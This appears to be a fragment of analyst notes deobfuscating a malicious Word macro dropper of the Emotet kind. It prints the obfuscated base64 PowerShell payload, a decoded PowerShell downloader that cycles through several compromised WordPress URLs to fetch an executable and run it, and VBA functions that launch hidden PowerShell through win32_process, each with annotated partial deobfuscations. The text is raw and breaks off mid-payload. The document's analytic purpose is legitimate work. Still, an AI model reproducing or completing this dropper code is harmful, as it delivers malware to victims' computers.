bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9ACg, bq,gAKg, bq,AAng, bq,AEcg, bq,AZAg, bq,AnAg, bq,CsAg, bq,JwBg, bq,lACg, bq,cAKg, bq,QArg, bq,ACgg, bq,AJwg, bq,B5Ag, bq,DcAg, bq,MAAg, bq,nACg, bq,sAJg, bq,wA5g, bq,ACcg, bq,AKQg, bq,ApAg, bq,DsAg, bq,JABg, bq,UAHg, bq,IANg, bq,wB5g, bq,ADAg, bq,AZQg, bq,BnAg, bq,D0Ag, bq,JgAg, bq,oACg, bq,cAbg, bq,gBlg, bq,AHcg, bq,ALQg, bq,BvAg, bq,GIAg, bq,agAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AGMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dAAg, bq,nACg, bq,kAIg, bq,ABOg, bq,AEUg, bq,AVAg, bq,AuAg, bq,FcAg, bq,ZQBg, bq,iAEg, bq,MAbg, bq,ABpg, bq,AGUg, bq,Abgg, bq,B0Ag, bq,DsAg, bq,JABg, bq,DAHg, bq,gAZg, bq,QBhg, bq,AGsg, bq,Acgg, bq,BxAg, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAag, bq,AAng, bq,ACsg, bq,AJwg, bq,B0Ag, bq,HQAg, bq,JwAg, bq,rACg, bq,cAcg, bq,AA6g, bq,AC8g, bq,ALwg, bq,BoAg, bq,GEAg, bq,eQAg, bq,nACg, bq,sAJg, bq,wBtg, bq,AGUg, bq,AdAg, bq,BlAg, bq,HQAg, bq,cgAg, bq,nACg, bq,sAJg, bq,wBhg, bq,AGQg, bq,AaQg, bq,BuAg, bq,GcAg, bq,LgAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,AYwg, bq,BvAg, bq,G0Ag, bq,JwAg, bq,rACg, bq,cALg, bq,wB3g, bq,AHAg, bq,ALQg, bq,BpAg, bq,G4Ag, bq,JwAg, bq,rACg, bq,cAYg, bq,wBsg, bq,AHUg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZABg, bq,lACg, bq,cAKg, bq,QArg, bq,ACgg, bq,AJwg, bq,BzAg, bq,CcAg, bq,KwAg, bq,nACg, bq,8Aeg, bq,QBHg, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,RQBg, bq,MACg, bq,cAKg, bq,wAog, bq,ACcg, bq,ASwg, bq,BqAg, bq,CcAg, bq,KwAg, bq,nADg, bq,QALg, bq,wAqg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GgAg, bq,dABg, bq,0AHg, bq,AAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,A6Ag, bq,CcAg, bq,KwAg, bq,oACg, bq,cALg, bq,wAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,HMAg, bq,JwAg, bq,pACg, bq,sAJg, bq,wBpg, bq,AG0g, bq,AJwg, bq,ArAg, bq,CcAg, bq,bwAg, bq,nACg, bq,sAJg, bq,wBmg, bq,AGYg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, bq,IAJg, bq,wArg, bq,ACcg, bq,AYgg, bq,BkAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAyg, bq,ADQg, bq,ALgg, bq,AnAg, bq,CsAg, bq,JwBg, bq,jAGg, bq,8Abg, bq,QAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,LwBg, bq,3ACg, bq,cAKg, bq,wAng, bq,AHAg, bq,ALQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBug, bq,AGMg, bq,AbAg, bq,B1Ag, bq,CcAg, bq,KwAg, bq,nAGg, bq,QAZg, bq,QAng, bq,ACkg, bq,AKwg, bq,AnAg, bq,HMAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wAvg, bq,AGYg, bq,AJwg, bq,ArAg, bq,CcAg, bq,cwBg, bq,pAFg, bq,EAYg, bq,wAng, bq,ACkg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,KgAg, bq,nACg, bq,sAJg, bq,wBog, bq,AHQg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0AHg, bq,AAOg, bq,gAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,NAAg, bq,wADg, bq,EAag, bq,wBwg, bq,AGwg, bq,AYQg, bq,AnAg, bq,CsAg, bq,JwBg, bq,uACg, bq,cAKg, bq,wAng, bq,AHMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,aQBg, bq,uAGg, bq,YAbg, bq,wAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,LgBg, bq,jAGg, bq,8AJg, bq,wArg, bq,ACcg, bq,AbQg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cALg, bq,wBjg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GcAg, bq,aQAg, bq,nACg, bq,kAKg, bq,wAng, bq,AC0g, bq,AYgg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,kAbg, bq,gAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,EsAg, bq,JwAg, bq,rACg, bq,cAdg, bq,ABGg, bq,AFIg, bq,Aawg, bq,AvAg, bq,CoAg, bq,JwAg, bq,rACg, bq,cAag, bq,AB0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0ACg, bq,cAKg, bq,wAng, bq,AHAg, bq,AOgg, bq,AnAg, bq,CkAg, bq,KwAg, bq,nACg, bq,8AJg, bq,wArg, bq,ACcg, bq,ALwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,YAag, bq,QAng, bq,ACsg, bq,AJwg, bq,BkAg, bq,GUAg, bq,bAAg, bq,nACg, bq,sAJg, bq,wBpg, bq,AHQg, bq,AeQg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cAZg, bq,wB1g, bq,AGkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZABg, bq,lACg, bq,4AYg, bq,wAng, bq,ACsg, bq,AJwg, bq,BvAg, bq,G0Ag, bq,LwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AGMg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZwBg, bq,pACg, bq,cAKg, bq,wAng, bq,AC0g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,iAGg, bq,kAbg, bq,gAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBWg, bq,AEEg, bq,ALwg, bq,AnAg, bq,CsAg, bq,JwAg, bq,qAGg, bq,gAdg, bq,AAng, bq,ACsg, bq,AJwg, bq,B0Ag, bq,HAAg, bq,cwAg, bq,nACg, bq,sAJg, bq,wA6g, bq,AC8g, bq,ALwg, bq,AnAg, bq,CkAg, bq,KwAg, bq,oACg, bq,cAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,BpAg, bq,HIAg, bq,bgBg, bq,hAGg, bq,sAbg, bq,QBpg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GQAg, bq,eQAg, bq,nACg, bq,sAJg, bq,wBlg, bq,ACcg, bq,AKQg, bq,ArAg, bq,CgAg, bq,JwBg, bq,jAGg, bq,kAJg, bq,wArg, bq,ACcg, bq,ALgg, bq,BjAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,G0Ag, bq,LwAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,wACg, bq,0AJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BpAg, bq,G4Ag, bq,JwAg, bq,rACg, bq,cAYg, bq,wAng, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,UAZg, bq,AAng, bq,ACsg, bq,AKAg, bq,AnAg, bq,GUAg, bq,JwAg, bq,rACg, bq,cAcg, bq,wAvg, bq,AHEg, bq,AJwg, bq,ApAg, bq,CsAg, bq,JwBg, bq,rACg, bq,cAKg, bq,wAng, bq,ADkg, bq,Adwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAFg, bq,cAMg, bq,gAvg, bq,ACcg, bq,AKwg, bq,AnAg, bq,CoAg, bq,aAAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHQg, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,0AHg, bq,AAcg, bq,wA6g, bq,ACcg, bq,AKwg, bq,AnAg, bq,C8Ag, bq,LwBg, bq,zAHg, bq,UAYg, bq,gAng, bq,ACkg, bq,AKwg, bq,AoAg, bq,CcAg, bq,aQBg, bq,0AGg, bq,8AYg, bq,wBhg, bq,AHIg, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgBg, bq,lACg, bq,cAKg, bq,QArg, bq,ACcg, bq,ALgg, bq,BjAg, bq,CcAg, bq,KwAg, bq,nAGg, bq,8Abg, bq,QAng, bq,ACsg, bq,AJwg, bq,AvAg, bq,HcAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wBwg, bq,AC0g, bq,AYwg, bq,BvAg, bq,CcAg, bq,KwAg, bq,nAGg, bq,4Adg, bq,ABlg, bq,ACcg, bq,AKwg, bq,AnAg, bq,G4Ag, bq,JwAg, bq,pACg, bq,sAKg, bq,AAng, bq,AHQg, bq,ALwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,CAHg, bq,kAZg, bq,QBPg, bq,AEEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,AOQg, bq,AvAg, bq,CcAg, bq,KwAg, bq,nACg, bq,oAag, bq,AB0g, bq,AHQg, bq,AJwg, bq,ArAg, bq,CcAg, bq,cABg, bq,zADg, bq,oAJg, bq,wApg, bq,ACsg, bq,AKAg, bq,AnAg, bq,C8Ag, bq,LwBg, bq,lAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BlAg, bq,HMAg, bq,JwAg, bq,pACg, bq,sAKg, bq,AAng, bq,AGEg, bq,AbAg, bq,AnAg, bq,CsAg, bq,JwBg, bq,pAGg, bq,IAJg, bq,wApg, bq,ACsg, bq,AKAg, bq,AnAg, bq,GEAg, bq,YQAg, bq,nACg, bq,sAJg, bq,wByg, bq,AGMg, bq,AJwg, bq,ApAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,gAag, bq,QB0g, bq,ACcg, bq,AKwg, bq,AnAg, bq,GUAg, bq,JwAg, bq,rACg, bq,cAYg, bq,wB0g, bq,ACcg, bq,AKwg, bq,AnAg, bq,C4Ag, bq,YwBg, bq,vAGg, bq,0ALg, bq,wB3g, bq,ACcg, bq,AKwg, bq,AnAg, bq,G8Ag, bq,cgBg, bq,kAHg, bq,AAcg, bq,gBlg, bq,ACcg, bq,AKwg, bq,AnAg, bq,HMAg, bq,cwAg, bq,nACg, bq,sAJg, bq,wAvg, bq,AFQg, bq,ALwg, bq,AnAg, bq,CkAg, bq,KQAg, bq,uACg, bq,IAcg, bq,wBgg, bq,AFAg, bq,ATAg, bq,BJAg, bq,FQAg, bq,IgAg, bq,oAFg, bq,sAYg, bq,wBog, bq,AGEg, bq,Acgg, bq,BdAg, bq,DQAg, bq,MgAg, bq,pADg, bq,sAJg, bq,ABTg, bq,AHIg, bq,AcAg, bq,B1Ag, bq,GIAg, bq,NgAg, bq,1ADg, bq,0AKg, bq,AAog, bq,ACcg, bq,ASQg, bq,A2Ag, bq,HoAg, bq,JwAg, bq,rACg, bq,cAZg, bq,ABfg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GwAg, bq,JwAg, bq,pACg, bq,sAJg, bq,wByg, bq,ACcg, bq,AKQg, bq,A7Ag, bq,GYAg, bq,bwBg, bq,yAGg, bq,UAYg, bq,QBjg, bq,AGgg, bq,AKAg, bq,AkAg, bq,FEAg, bq,ZQBg, bq,jAGg, bq,cAdg, bq,AA0g, bq,AHkg, bq,AIAg, bq,BpAg, bq,G4Ag, bq,IAAg, bq,kAEg, bq,MAeg, bq,ABlg, bq,AGEg, bq,Aawg, bq,ByAg, bq,HEAg, bq,KQBg, bq,7AHg, bq,QAcg, bq,gB5g, bq,AHsg, bq,AJAg, bq,BUAg, bq,HIAg, bq,NwBg, bq,5ADg, bq,AAZg, bq,QBng, bq,AC4g, bq,AIgg, bq,BEAg, bq,G8Ag, bq,YABg, bq,XAGg, bq,4AYg, bq,ABMg, bq,AE8g, bq,AQQg, bq,BEAg, bq,GYAg, bq,aQBg, bq,sAEg, bq,UAIg, bq,gAog, bq,ACQg, bq,AUQg, bq,BlAg, bq,GMAg, bq,ZwBg, bq,0ADg, bq,QAeg, bq,QAsg, bq,ACAg, bq,AJAg, bq,BCAg, bq,G4Ag, bq,cABg, bq,fAHg, bq,MANg, bq,QB2g, bq,ACkg, bq,AOwg, bq,AkAg, bq,EMAg, bq,cgBg, bq,jAHg, bq,QAdg, bq,ABug, bq,AHYg, bq,APQg, bq,AoAg, bq,CgAg, bq,JwBg, bq,SAGg, bq,MAJg, bq,wArg, bq,ACcg, bq,AdQg, bq,BtAg, bq,CcAg, bq,KQAg, bq,rACg, bq,cAdg, bq,QAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,HgAg, bq,JwAg, bq,pADg, bq,sASg, bq,QBmg, bq,ACAg, bq,AKAg, bq,AoAg, bq,C4Ag, bq,KAAg, bq,nAEg, bq,cAZg, bq,QB0g, bq,AC0g, bq,ASQg, bq,B0Ag, bq,CcAg, bq,KwAg, bq,nAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,AbQg, bq,AnAg, bq,CkAg, bq,IAAg, bq,kAEg, bq,IAbg, bq,gBwg, bq,AF8g, bq,Acwg, bq,A1Ag, bq,HYAg, bq,KQAg, bq,uACg, bq,IATg, bq,ABlg, bq,AGAg, bq,ATgg, bq,BgAg, bq,EcAg, bq,VABg, bq,IACg, bq,IAIg, bq,AAtg, bq,AGcg, bq,AZQg, bq,AgAg, bq,DMAg, bq,NwAg, bq,5ADg, bq,cANg, bq,gApg, bq,ACAg, bq,Aewg, bq,AmAg, bq,CgAg, bq,JwBg, bq,JAGg, bq,4Adg, bq,gBvg, bq,AGsg, bq,AJwg, bq,ArAg, bq,CcAg, bq,ZQAg, bq,nACg, bq,sAJg, bq,wAtg, bq,ACcg, bq,AKwg, bq,AnAg, bq,EkAg, bq,dABg, bq,lAGg, bq,0AJg, bq,wApg, bq,ACgg, bq,AJAg, bq,BCAg, bq,G4Ag, bq,cABg, bq,fAHg, bq,MANg, bq,QB2g, bq,ACkg, bq,AOwg, bq,AkAg, bq,EMAg, bq,bgBg, bq,tAGg, bq,4Adg, bq,gAxg, bq,AGIg, bq,APQg, bq,AoAg, bq,CcAg, bq,RQAg, bq,xACg, bq,cAKg, bq,wAog, bq,ACcg, bq,Aegg, bq,AwAg, bq,G4Ag, bq,YwAg, bq,nACg, bq,sAJg, bq,wA5g, bq,ACcg, bq,AKQg, bq,ApAg, bq,DsAg, bq,YgBg, bq,yAGg, bq,UAYg, bq,QBrg, bq,ADsg, bq,AJAg, bq,BFAg, bq,HUAg, bq,bwAg, bq,4AGg, bq,8Aag, bq,ABug, bq,AD0g, bq,AKAg, bq,AnAg, bq,FcAg, bq,JwAg, bq,rACg, bq,gAJg, bq,wA3g, bq,AF8g, bq,AbAg, bq,ByAg, bq,CcAg, bq,KwAg, bq,nADg, bq,QAYg, bq,wAng, bq,ACkg, bq,AKQg, bq,B9Ag, bq,H0Ag, bq,YwBg, bq,hAHg, bq,QAYg, bq,wBog, bq,AHsg, bq,AfQg, bq,B9Ag, bq,CQAg, bq,VQBg, bq,tADg, bq,gAMg, bq,ABmg, bq,AHYg, bq,AdAg, bq,A9Ag, bq,CgAg, bq,KAAg, bq,nAEg, bq,EAJg, bq,wArg, bq,ACcg, bq,ANgg, bq,BtAg, bq,CcAg, bq,KQAg, bq,rACg, bq,cAeg, bq,AA3g, bq,ACcg, bq,AKwg, bq,AnAg, bq,HYAg, bq,bAAg, bq,nACg, bq,kA\r\n<\/pre>\n
\r\n$Uevwzgz=((Bknt)(45p));\r\n&(new-item) $ENV:usErprOFile\\yv3Wm9g\\wZN78e8\\ -itemtype dIReCToRy;\r\n[Net.ServicePointManager]::"SEC`UrI`TYP`ROtOC`ol" = ((tls12,) t(ls11, t)ls);\r\n$Q3ywioo = ((Tii)(0bc)p);\r\n$Efe5qz9=(W(z5d4)4e);\r\n$Bnp_s5v=$env:userprofile(((gQWYv3)wm9g(gQW)(Wzn7)8e(8gQW))."rep`l`Ace"(([ChAr]103[ChAr]81[ChAr]87),[sTRING][ChAr]92))$Q3ywioo(.(exe));\r\n$Xstbuxr=((Gde)(y709));\r\n$Tr7y0eg=&(new-object) NET.WebClient;\r\n$Cxeakrq=((http:\/\/haymetetrading.)(com\/wp-include)(s\/yG)EL(Kj4\/*http):(\/\/s)imoff(erbd)(24.com)(\/wp-i)(nclude)s(\/fsiQc)\/*ht(tp:\/\/401kplansinfo)(.com)(\/cgi)-b(in\/KtFRk\/*ht)(tp:)\/\/(fidelity)(guide.com\/)cgi-(bin\/)(VA\/*http:\/\/)(sirnakmidye)(ci.c)(om\/)(wp-)includ(es\/q)k9w(W2\/*h)t(tps:\/\/sub)(itocarne).com\/w(p-conten)(t\/ByeOAt)(9\/*https:)(\/\/elies)(alib)(aarc)(hitect.com\/wordpress\/T\/))."s`PLIT"([char]42);\r\n$Srpub65=((I6zd_l)r);\r\nforeach($Qecgt4y in $Cxeakrq){try{$Tr7y0eg."Do`Wn`LOADfilE"($Qecgt4y, $Bnp_s5v);\r\n$Crcttnv=((Rcum)ukx);\r\nIf ((.(Get-Item) $Bnp_s5v)."Le`N`GTH" -ge 37976) {&(Invoke-Item)($Bnp_s5v);\r\n$Cnmnv1b=(E1(z0nc9));\r\nbreak;\r\n$Euo8ohn=(W(7_lr4c))}}catch{}}$Um80fvt=((A6m)x7vl)\r\n<\/pre>\n\r\nFunction Cbzdhgt82a6foxc53q()\r\n On Error Resume Next\r\n Quuseim6entz = 90\r\n Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))\r\n Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"\r\n Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)\r\n Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)\r\n Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber\r\n Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)\r\n Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel\r\nEnd Function\r\n \r\n Function Cbzdhgt82a6foxc53q()\r\n On Error Resume Next\r\n Quuseim6entz = 90\r\n Ay7pmbj8ld_rk9 = s (Vc0veos27yszc gets dropped sicne it is empty\/null)\r\n Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + s + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"\r\n Wuueqzhfpms6gh3_p = winmgmt"+s+":win32_"+p+"rocess\r\n Set Cfsnuq6d3vy5e = CreateObject(winmgmt"+s+":win32_"+p+"rocess)\r\n Oxxxpk19hkgi4c7c0z = winmgmt"+s+":win32_"+p+"rocess + s + tar + tu\r\n Set Tn1cdl9lltyho4skel = winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p\r\n Cfsnuq6d3vy5e.Create "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9, winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p\r\n End Function\r\n\r\nFunction Zk46e7c8d40(G7b_e54iwh7id_)\r\n On Error Resume Next\r\n X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)\r\n Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")\r\n B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)\r\n Zk46e7c8d40 = B4ru9eb_hhowd\r\nEnd Function\r\n\r\n Function Zk46e7c8d40(G7b_e54iwh7id_)\r\n On Error Resume Next\r\n X8e38jclqayh83g3a6 = "g,bq,g,bq,wg,bq,ig,bq,nmg,bq,g,bq,gmg,bq,tg,bq,g,bq,"+s+"g,bq,g,bq,:g,bq,wg,bq,ing,bq,g,bq,3g,bq,2g,bq,_g,bq,"+p+"g,bq,rog,bq,g,bq,ceg,bq,sg,bq,sg,bq,"\r\n Hy1d43_mrbnkby5l = winmgmt"+s+":win32_"+p+"rocess\r\n B4ru9eb_hhowd = winmgmt"+s+":win32_"+p+"rocess (Sg918dyn87p9_2\/Gcqeayz9i6vt1m44y1 gets dropped since null\/empty)\r\n Zk46e7c8d40 = winmgmt"+s+":win32_"+p+"rocess\r\n End Function\r\n\r\nFunction Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)\r\n On Error Resume Next\r\n Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)\r\n showwindow = wdKeyEquals - wdKeyEquals\r\nEnd Function\r\n \r\n Function Ngdcwyg32b4skvo5c1(winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p)\r\n On Error Resume Next\r\n Set Ngdcwyg32b4skvo5c1 = GetObject(winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p)\r\n showwindow = 0\r\n End Function\r\n\r\nFunction Qfyk87zgdp86ufle()\r\n On Error Resume Next\r\n Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$\r\n Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)\r\nEnd Function\r\n\r\n Function Qfyk87zgdp86ufle()\r\n On Error Resume Next\r\n Puw2oumxgis = "powe" + "rshe" + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, 